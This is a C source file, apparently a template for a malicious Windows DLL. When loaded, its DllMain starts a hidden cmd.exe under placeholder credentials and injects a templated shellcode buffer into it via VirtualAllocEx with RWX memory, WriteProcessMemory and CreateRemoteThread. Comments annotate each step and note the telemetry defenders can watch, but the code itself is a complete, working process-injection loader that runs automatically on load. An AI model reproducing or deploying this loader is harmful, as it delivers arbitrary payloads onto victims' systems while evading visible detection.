#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
%%BUFFER%%
/*
 * RunMe — spawns a hidden cmd.exe under the hard-coded placeholder
 * credentials and places `shellcode` into that child process.  Sequence as
 * written: CreateProcessWithLogonW -> VirtualAllocEx (RWX) ->
 * WriteProcessMemory -> CreateRemoteThread.  Always returns 0; the value is
 * discarded by the DllMain caller.
 *
 * Assumes %%BUFFER%% (above) expands to an array definition named
 * `shellcode`: `sizeof shellcode` is only the payload length for an array,
 * not for a pointer — TODO confirm what the template substitutes there.
 *
 * From a defensive standpoint every step here is a well-known telemetry
 * point: a process created with explicit credentials
 * (CreateProcessWithLogonW), a cross-process PAGE_EXECUTE_READWRITE
 * allocation, a cross-process memory write, and a remote thread whose start
 * address lies inside that fresh allocation.
 */
DWORD WINAPI RunMe()   /* non-prototype declaration: no parameter list given */
{
    HANDLE pHandle;
    PVOID remoteBuffer;
    STARTUPINFO SI = { 0 };
    PROCESS_INFORMATION PI = { 0 };
    ZeroMemory(&SI, sizeof(SI));   /* redundant: SI and PI are already zero-initialised above */
    SI.cb = sizeof(SI);
    ZeroMemory(&PI, sizeof(PI));
    SI.dwFlags = 1;        /* 1 == STARTF_USESHOWWINDOW: wShowWindow is honoured */
    SI.wShowWindow = 0;    /* 0 == SW_HIDE: the child gets no visible window */
    /* Placeholder user / domain / password (L"aaa" / L"bbb" / L"ccc").
     * dwLogonFlags 0x00000002 == LOGON_NETCREDENTIALS_ONLY;
     * dwCreationFlags 0x04000000 == CREATE_NO_WINDOW.
     * A failed process creation is not reported: the function just returns 0. */
    if(!CreateProcessWithLogonW(L"aaa", L"bbb", L"ccc", 0x00000002, L"C:\\Windows\\System32\\cmd.exe", NULL, 0x04000000, NULL, L"c:\\windows\\system32\\", &SI, &PI)) {
        return 0;
    }
    pHandle = PI.hProcess;
    /* The remote region is writable and executable at once (RWX) — the
     * classic injection signature — and is never released. */
    remoteBuffer = VirtualAllocEx(pHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    if (remoteBuffer != NULL)
    {
        /* Neither result is checked, so a failed write or thread creation
         * leaves no trace in this DLL's own behaviour.  The HANDLE returned
         * by CreateRemoteThread is discarded and therefore leaks until the
         * host process exits. */
        WriteProcessMemory(pHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
        CreateRemoteThread(pHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
    }
    CloseHandle(pHandle);      /* pHandle is PI.hProcess */
    CloseHandle(PI.hThread);   /* the child's primary thread handle */
    return 0;
}
/*
 * DllMain — loader entry point.  The only notification that does any work
 * is DLL_PROCESS_ATTACH, which calls RunMe() inline on the loading thread;
 * thread attach/detach and process detach are no-ops.  The function always
 * returns FALSE, which tells the loader that initialisation failed even
 * though RunMe has already executed by that point.
 *
 * hDll and lpReserved are unused.
 */
BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved) {
    (void)hDll;
    (void)lpReserved;

    if (dwReason == DLL_PROCESS_ATTACH) {
        RunMe();   /* return value (always 0) is discarded */
    }
    /* DLL_THREAD_ATTACH, DLL_THREAD_DETACH, DLL_PROCESS_DETACH: nothing to do */
    return FALSE;
}